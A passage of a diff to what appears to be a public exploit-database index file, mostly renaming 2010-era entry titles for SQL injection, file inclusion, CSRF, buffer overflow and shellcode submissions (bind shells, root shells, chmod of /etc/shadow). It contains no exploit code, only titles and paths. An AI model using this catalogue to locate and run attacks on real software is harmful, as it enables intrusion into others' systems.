Execution Vulnerability",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win32/shellcode/14014.pl,"ShellCode WinXP SP3 SPA URLDownloadToFileA + CreateProcessA + ExitProcess",2010-06-24,d0lc3,win32,shellcode,0 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability",2010-06-24,v3n0m,php,webapps,0 @@ -12316,7 +12316,7 @@ id,file,description,date,author,platform,type,port 14026,platforms/php/webapps/14026.txt,"AbleDating script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 -14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client v2.2.1 ""Request"" Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 +14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - ""Request"" Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,MadjiX,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI Vulnerability",2010-06-24,"Zer0 Thunder",php,webapps,0 @@ -12325,43 +12325,43 @@ id,file,description,date,author,platform,type,port 14036,platforms/windows/dos/14036.pl,"Geomau 7 (.wg2) local Buffer Overflow PoC",2010-06-24,MadjiX,windows,dos,0 14037,platforms/windows/dos/14037.pl,"Plotwn 18 (.wp2) local Buffer Overflow PoC",2010-06-24,MadjiX,windows,dos,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 Stack Buffer Overflow",2010-06-25,MadjiX,windows,local,0 -14046,platforms/windows/local/14046.py,"FieldNotes 32 v5.0 Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 +14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script SQL Injection and Cross Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 14048,platforms/php/webapps/14048.txt,"2DayBiz Multiple SQL Injection",2010-06-25,Sangteamtham,php,webapps,0 -14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script v2.7.0 - [CSRF] Add Admin Account",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 -14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat v3.3 Remote File Inclusion & XSS Vulnerability",2010-06-25,"Zer0 Thunder",php,webapps,0 +14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - [CSRF] Add Admin Account",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 +14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS Vulnerability",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2daybiz B2B Portal Script (selling_buy_leads1.php) SQL Injection Vulnerability",2010-06-25,r45c4l,php,webapps,0 14052,platforms/windows/shellcode/14052.c,"Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes",2010-06-25,RubberDuck,windows,shellcode,0 14053,platforms/php/webapps/14053.txt,"snipe gallery Script Sql Injection",2010-06-25,"dev!l ghost",php,webapps,0 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit SQL Injection Vulnerability",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) RFI",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS Blind SQL Injection Vulnerability",2010-06-26,hacker@sr.gov.yu,php,webapps,0 -14057,platforms/php/webapps/14057.txt,"Vulnerabilities in Cimy Counter for WordPress",2010-06-26,sebug,php,webapps,0 +14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter - Vulnerabilities",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHPnuke 8.2 Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component Persistent XSS Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 -14068,platforms/windows/local/14068.py,"Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0 -14070,platforms/php/webapps/14070.txt,"Speedy v1.0 Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0 +14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0 +14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 (.m3u) Local BOF PoC",2010-06-26,MadjiX,windows,dos,0 -14072,platforms/windows/dos/14072.c,"UltraISO v9.3.6.2750 .mds .mdf Files Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0 +14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0 14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 14074,platforms/php/webapps/14074.rb,"2daybiz Polls Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 14075,platforms/php/webapps/14075.rb,"2daybiz Freelance Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 14076,platforms/php/webapps/14076.rb,"2daybiz Photo Sharing Script SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 -14077,platforms/windows/local/14077.rb,"BlazeDVD v6.0 Buffer Overflow Exploit (Meta)",2010-06-27,Blake,windows,local,0 -14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload v1.09 Remote Shell Upload Vulnerability",2010-06-27,Mr.Benladen,php,webapps,0 +14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow Exploit (Meta)",2010-06-27,Blake,windows,local,0 +14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Remote Shell Upload Vulnerability",2010-06-27,Mr.Benladen,php,webapps,0 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine SQL Injection Vulnerability",2010-06-27,Sid3^effects,php,webapps,0 14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine SQL Injection Vulnerability",2010-06-27,Sid3^effects,php,webapps,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 Buffer Overflow (SEH)",2010-06-27,MadjiX,windows,local,0 -14083,platforms/linux/dos/14083.pl,"Scite Text Editor v1.76 Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 +14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 SQL Injection Vunerability",2010-06-27,"L0rd CrusAd3r",php,webapps,0 14085,platforms/php/webapps/14085.txt,"iNet Online Community Blind SQLi Vulnerability",2010-06-28,JaMbA,php,webapps,0 -14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability",2010-06-28,Dark.Man,php,webapps,0 +14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability",2010-06-28,Dark.Man,php,webapps,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 -14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion v2.2.1 Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 +14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 Stack buffer overflow",2010-06-28,"fl0 fl0w",windows,local,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 @@ -12369,33 +12369,33 @@ id,file,description,date,author,platform,type,port 14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh"",""/bin/sh"",0) - 30 bytes",2010-06-28,"Jonathan Salwan",linux,shellcode,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb Multiple Remote Dos",2010-06-28,Markot,windows,dos,80 -14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro v3.0.4 CMS upload Vulnerability",2010-06-28,Battousai,multiple,webapps,80 -14102,platforms/windows/dos/14102.py,"Winamp v5.571 Malicious AVI Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 +14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload Vulnerability",2010-06-28,Battousai,multiple,webapps,80 +14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS Remote SQL Injection Vulnerability",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 (videos.php) SQL Injection Vulnerability",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script (docID) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 -14110,platforms/php/webapps/14110.txt,"Allomani - E-Store v1.0 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 -14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia v2.5 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 +14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 +14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS (result.php) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 14113,platforms/linux/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(""/bin/sh"",""/bin/sh"",0) - 38 bytes",2010-06-29,"Jonathan Salwan",linux,shellcode,0 14114,platforms/linux/webapps/14114.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-29,"Inj3ct0r Team",linux,webapps,80 14115,platforms/windows/webapps/14115.txt,"Gekko CMS (SQL Injection) Vulnerability",2010-06-29,[]0iZy5,windows,webapps,80 14116,platforms/linux/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes",2010-06-29,"Jonathan Salwan",linux,shellcode,0 -14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) <=4.3.x Remote SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 +14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) <= 4.3.x - Remote SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS (news.php) SQL Injection Vulnerability",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Polymorphic /bin/sh x86 linux shellcode",2010-06-29,gunslinger_,lin_x86,shellcode,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/linux/shellcode/14122.txt,"Linux/ARM chmod(""/etc/shadow"", 0777) Shellcode 35 Bytes",2010-06-29,"Florian Gaultier",linux,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection Vulnerability",2010-06-29,"Dr.0rYX and Cr3w-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 -14125,platforms/php/webapps/14125.pl,"ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 +14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager SQL Injection Vulnerability",2010-06-30,Sid3^effects,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability",2010-06-30,RoAd_KiLlEr,php,webapps,0 14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0 -14132,platforms/php/webapps/14132.html,"webERP v3.11.4 Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 +14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14139,platforms/linux/shellcode/14139.c,"Linux/ARM - Disable ASLR Security - 102 bytes",2010-06-30,"Jonathan Salwan",linux,shellcode,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(""/etc/shadow"", 0777) - 84 Bytes",2010-06-30,"Florian Gaultier",linux,shellcode,0 @@ -12411,13 +12411,13 @@ id,file,description,date,author,platform,type,port 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection Vulnerability",2010-07-01,K053,asp,webapps,0 14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability",2010-07-01,MSRC,windows,dos,0 -14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter v3.1.2.1 .m3u Buffer Overflow",2010-07-01,MadjiX,windows,local,0 +14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.m3u) Buffer Overflow",2010-07-01,MadjiX,windows,local,0 14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0 14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 -14166,platforms/php/webapps/14166.txt,"Bit Weaver v2.7 Local File Inclusion Vulnerability",2010-07-02,"John Leitch",php,webapps,0 +14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion Vulnerability",2010-07-02,"John Leitch",php,webapps,0 14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 14169,platforms/asp/webapps/14169.txt,"MooreAdvice (productlist.asp) SQL injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 14170,platforms/php/webapps/14170.txt,"Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 @@ -12435,18 +12435,18 @@ id,file,description,date,author,platform,type,port 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0 -14188,platforms/php/webapps/14188.html,"Cpanel v11.25 CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 +14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL); - XOR 88 encoded - 78 bytes",2010-07-03,"Jonathan Salwan",arm,shellcode,0 -14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter v3.1.2.1 Local Buffer Overflow (SEH)",2010-07-03,MadjiX,windows,local,0 +14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,MadjiX,windows,local,0 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0 14193,platforms/php/webapps/14193.c,"iScripts SocialWare 2.2.x Multiple Remote Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 Remote Exploit",2010-07-03,dmc,windows,remote,0 -14195,platforms/windows/remote/14195.html,"SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite",2010-07-03,Blake,windows,remote,0 +14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,Blake,windows,remote,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads Persistent XSS Vulnerability",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 14199,platforms/php/webapps/14199.txt,"phpaaCms v0.3.1 (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 -14200,platforms/windows/remote/14200.html,"Registry OCX v1.5 ActiveX Buffer Overflow Exploit",2010-07-04,Blake,windows,remote,0 +14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow Exploit",2010-07-04,Blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"phpaaCms (list.php?id) SQL Injection Vulnerability",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 @@ -12454,19 +12454,19 @@ id,file,description,date,author,platform,type,port 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0 -14208,platforms/php/webapps/14208.txt,"Sandbox v2.0.2 Local File Inclusion Vulnerability",2010-07-04,saudi0hacker,php,webapps,0 +14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion Vulnerability",2010-07-04,saudi0hacker,php,webapps,0 14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System Upload Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0 -14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 +14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 ActiveX Head Buffer Overflow",2010-07-05,Blake,windows,local,0 14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp v0.28 SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 14218,platforms/linux/shellcode/14218.c,"161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"62 bytes setreuid(0,0) execve(""/bin/sh"",NULL,NULL) XOR Encoded Linux Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 -14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion v2.2.1 BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0 +14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 @@ -12488,13 +12488,13 @@ id,file,description,date,author,platform,type,port 14241,platforms/php/webapps/14241.txt,"BS Business Directory (articlesdetails.php) SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads (articlesdetails.php) SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14243,platforms/php/webapps/14243.txt,"BS Events Directory (articlesdetails.php) SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 -14244,platforms/php/webapps/14244.txt,"Lyrics V3 Engine SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 +14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability & Auth Bypass Vulnerabilty.",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass vulnerability",2010-07-06,altbta,php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial Sqli Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 -14251,platforms/php/webapps/14251.txt,"PsNews v1.3 SQL Injection Vulnerability",2010-07-06,S.W.T,php,webapps,0 +14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection Vulnerability",2010-07-06,S.W.T,php,webapps,0 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 14255,platforms/php/webapps/14255.txt,"Sandbox 2.0.3 Multiple Remote Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 @@ -12513,12 +12513,12 @@ id,file,description,date,author,platform,type,port 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 ActiveX Buffer Overflow",2010-07-08,Blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection Vulnerability",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion Vulnerability",2010-07-08,eidelweiss,php,webapps,0 -14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - OSX Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 +14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OSX Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI Vulnerability",2010-07-08,Sid3^effects,php,webapps,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 0day for WinXP",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes",2010-07-08,gunslinger_,linux,shellcode,0 -14277,platforms/php/webapps/14277.txt,"Inout Music v1.0 Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 +14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14280,platforms/php/webapps/14280.txt,"PG Social Networking Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 @@ -12530,12 +12530,12 @@ id,file,description,date,author,platform,type,port 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 -14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 Cross Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 -14290,platforms/windows/dos/14290.py,"MP3 Cutter v1.5 DoS Exploit",2010-07-09,"Prashant Uniyal",windows,dos,0 +14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 Cross Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 +14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - DoS Exploit",2010-07-09,"Prashant 